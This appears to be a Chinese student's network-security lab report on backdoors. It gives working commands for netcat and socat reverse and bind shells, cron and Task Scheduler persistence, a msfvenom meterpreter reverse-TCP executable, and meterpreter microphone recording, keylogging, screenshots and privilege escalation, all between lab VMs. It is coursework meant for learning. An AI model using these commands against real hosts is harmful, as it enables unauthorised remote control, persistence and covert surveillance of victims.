实验内容

    1. 使用netcat获取主机操作Shell,cron启动 (0.5分)

    2. 使用socat获取主机操作Shell, 任务计划启动 (0.5分)

    3. 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

    4. 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

    5. 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)

任务一:使用netcat获取主机操作Shell,cron启动

1.Windows获得Linux shell

1.1使用ipconfig获取Windows上的ip地址

1.2输入cd命令,然后将解压后的ncat文件拖到命令行当中,再输入ncat.exe -l -p 4312监听4312端口,等待Linux连接这个端口。

1.3在linux中输入nc  192.168.181.135  4312 -e /bin/sh 反弹连接windows。

1.4windows获得linux的shell后,可执行linux相关的命令,可以自己验证。

2.linux获得windows shell

2.1在linux中输入ifconfig查看IP地址。

2.2linux中输入nc -l -p 4312来监听本地4312端口。

2.3在windows中输入ncat.exe -e cmd.exe 192.168.181.136 4312 来反弹连接linux。

2.4在linux中可以看到windows的命令行,获得windows的shell,可以执行任意指令,输入ipconfig可以看到我windows虚拟机上的IP地址。

3.nc传输数据

3.1在windows中输入ncat.exe -l 4312 来监听本地4312端口。

3.2在linux中输入nc 192.168.181.135 4312 连接到windows的4312端口。

3.3windows和Linux之间就可以实现数据的传输了,验证之。

4.使用ncat获取主机cron启动

4.1在windows中输入ncat.exe -l -p 4312监听本机4312端口。

4.2在Linux中输入crontab -e 命令来增加一条定时任务。

输入 '3' 进入vim编辑器:

进入vim后按 ' i ' 进入编辑模式 ,在最后一行输入 42 * * * * /bin/netcat 192.168.181.135 4312 -e /bin/sh,要求每小时第44分钟执行后面的指令(此刻时间为42,所以设置为44,方便观察),最后敲击 “esc键”退出编辑模式并输入 :wq 保存并退出。tip:在44后在Windows中输入ls进行验证。

任务二:使用socat获取主机操作Shell, 任务计划启动

1.在windows中,找到“任务计划”

2.在计划任务程序菜单栏的操作选项中选择“创建任务”,填写任务名称,新建触发器,开始任务一栏选择“工作站锁定时”。

3.新建操作

3.1在操作选项中点击新建:

3.2选择启动程序为socat.exe

tips:添加参数一栏中填写 tcp-listen:4312 exec:cmd.exe,pty,stderr   其含义为把cmd.exe绑定到4312端口上,并把cmd.exe的stderr重定向到stdou。

4.创建完成后,敲击“win+L”快捷键锁定计算机,再次打开时,发现弹出一命令行窗口。

tips:切到计划程序中发现4312已经正在运行中:

5.在kali终端输入指令 socat - tcp:192.168.181.135:4312

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali上输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.181.136 LPORT=4312 -f exe > 20164312_backdoor.exe

tips:LHOST是LINUX的IP,因为是windows连接linux然后linux端口反弹。

2.在windows下执行ncat.exe -lv 4312 > 20164312_backdoor.exe此时被控主机进入接收文件模式。

3.在Linux下执行nc 192.168.181.135 4312 < 20164312_backdoor.exe

tips:此时的ip为windows的ip,因为是linux传送后门软件给windows。

4.查看user文件夹中是否接收20164312-backdoor.exe文件。

5.在linux中输入msfconsole命令:

tips:1.输入use exploit/multi/handler 使用监听模块,设置payload。

    2.输入set payload windows/meterpreter/reverse_tcp 设置载荷,基于tcp的反向连接反弹windows shell。

    3.输入set LHOST 192.168.181.136 设置Linux的ip。

    4.输入set LPORT 4312 设置本机端口。

6.输入show options 查看设置是否正确:

7.输入exploit 运行模块:

8.在Windows中双击运行"20164312_backdoor.exe"文件,Linux获得windows主机连接,并获得shell:

任务四: 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.在Linux中输入record_mic 指令截获一段音频:

2.使用webcam_snap指令可以使用摄像头进行拍照:

tips:无法找到,这里是因为我用的是win10的虚拟机,但是win10的虚拟机没有带摄像头,所以无法获取。

3.使用screenshot指令可以进行截屏:

4.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

5.输入getuid查看当前用户

6.尝试提权(貌似失败了)

tips:去别的同学那里偷师学艺知道用管理员身份运行后,成功提权:

基础问题回答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?

    浏览网页去下载自己想要的软件是,可能下载的是被黑客调包了的软件,下载完成后点击运行可能就在自己电脑中植入了别人的后门软件。

  • (2)例举你知道的后门如何启动起来(win及linux)的方式?

    windows下可能是被设置成开机自动启动的类型,Linux下可以是使用cron启动。

  • (3)Meterpreter有哪些给你映像深刻的功能?

    可以夺取对方主机的控制权限,然后从别人的主机中盗取有用的信息。

  • (4)如何发现自己有系统有没有被安装后门?

    下载正版的安全软件,定期清查电脑。

 实验总结与体会

  这次实验总的来说是那种我们日常生活中可能会碰到的网络安全问题,对于这个实验的掌握和了解能够帮助我们这些电脑小白尽量的原理可能危害到我们自生的网站、软件等等,有了这个方面的知识我们在浏览网页和下载软件是就能更好的避免被怀有不良想法的黑客所攻击,当然这也让我对后门这一黑客技术有一个更加深刻的了解,所以说杀毒软件还是有必要的,不能因为占内存就删掉了。

Exp2后门原理与实践 20164312马孝涛的更多相关文章

  1. Exp3免杀原理与实践 20164312 马孝涛

    1.实验要求   1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编 ...

  2. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  3. 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week3 20165326

    Exp2 后门原理与实践 目录 1. 实验原理 2. 实验内容 3. 问题回答 4. 心得体会 实验原理简介 后门:不经过正常流程而访问系统的通道 ncat:底层工具,进行基本的TCP UDP数据收发 ...

  4. 20165213 周启航Exp2 后门原理与实践

    Exp2 后门原理与实践 实验内容 任务一 使用netcat获取主机操作Shell,cron启动 1.确认kali和主机的ip,关闭防火墙 (192.169.127.132) (10.1.1.197) ...

  5. 20155205 郝博雅 Exp2 后门原理与实践

    20155205 郝博雅 Exp2 后门原理与实践 一.基础问题回答 后门(木马) 专用程序 投放 隐藏(免杀) 启动(自启动.绑定) (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:上学 ...

  6. Exp2 后门原理与实践 20164321 王君陶

    Exp2 后门原理与实践 20164321 王君陶 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过漏洞,点击陌生链接,或者浏览不良网页挂马. 2.例举你知 ...

  7. 2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践

    #2017-2018-2 <网络对抗技术> 20155322 第五周 Exp2 后门原理与实践 [博客目录] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过 ...

  8. 20165218 《网络对抗技术》Exp2 后门原理与实践

    Exp2 后门原理与实践 准备工作 1. 查看Linux和Win的IP地址,ping通 Linux地址 Win7地址 ping 2.下载ncat并装载到win7主机 3.下载socat并装载到win7 ...

  9. 2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165219<网络对抗技术>Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动 使用Socat获取主机操作Shell, 任 ...

随机推荐

  1. springboot+activemq中引入重发机制

    一.简介 在使用activemq消息中间件进行消息队列传输时,总会由于各种原因导致消息失败. 一个经典的场景是一个生成者向Queue中发消息,里面包含了一组邮件地址和邮件内容.而消费者从Queue中将 ...

  2. java并发之ReentrantLock学习理解

    简介 java多线程中可以使用synchronized关键字来实现线程间同步互斥,但在jdk1.5中新增加了ReentrantLock类也能实现同样的效果,并且在扩展功能上也更加强大,比如具有嗅探锁定 ...

  3. @Controller和@RestController之间的区别

    1. Controller, RestController的共同点 都是用来表示Spring某个类的是否可以接收HTTP请求 2. Controller, RestController的不同点 @Co ...

  4. PyCharm下载及安装教程

    pycharm官网地址 https://www.jetbrains.com/pycharm/download/#section=windows 下载社区版 选择安装路径E:\Python\pychar ...

  5. 关于<input type="date">这种取值的问题 【原创】

    举例 <input type="date" id="date1"> var num = $("#date1").val(); a ...

  6. 两种方法轻松搞定-- Eclipse 安装FindBugs插件

    1安装:首先到官方网站下载最新版本FindBugs    http://findbugs.sourceforge.net/downloads.html              将 edu.umd.c ...

  7. MAC下安装如何安装mysql?

    最近有位搞开发的朋友,估计是买了一个新的MAC本,他说不是很熟悉这个系统(什么人哪,太懒了!),于是让我给他装一下后台开发过程中经常使用的数据库软件MYSQL,今天给大家分享一下我的操作步骤以及出现问 ...

  8. 【BZOJ 3754】: Tree之最小方差树

    题目链接: TP 题解: 都是骗子233,我还以为是什么神奇的算法. 由于边权的范围很小,最小生成树和最大生成树之间的总和差不会太大,所以可以枚举边权和,再直接根据方差建最小生成树,每次更新答案即可. ...

  9. 【UOJ】67 新年的毒瘤 &【BZOJ】1123 BLO

    [UOJ 67] 题目链接: 传送门 题解: 第一眼很懵逼……这什么鬼. 思考什么点复合条件……(o(>﹏<)o 1.树,也就是说还剩n-2条边,等价于要删去一个度数为m-n+2的点. 2 ...

  10. Android+appium +python 点击坐标tap方法的封装

    当常使用的查找点击元素的方法name.id.classname等无法使用时,我们将会采取坐标的点击来实现操作,同样存在一个问题,当手机的分辨率.屏幕大小不一致时,坐标的定位也会不同,因此将采用相对坐标 ...